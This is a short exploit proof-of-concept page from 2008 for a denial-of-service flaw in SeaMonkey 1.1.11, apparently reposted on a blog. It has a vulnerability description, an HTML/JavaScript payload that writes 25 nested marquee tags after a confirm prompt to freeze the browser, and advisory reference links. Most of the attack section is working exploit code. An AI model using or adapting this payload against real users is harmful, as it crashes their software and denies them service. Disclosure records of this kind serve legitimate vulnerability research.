<!--
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
<head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script> </center> </body> </head> </html>
http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070
Test: http://www.zeroscience.org/codes/seamonkey_dos.html
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment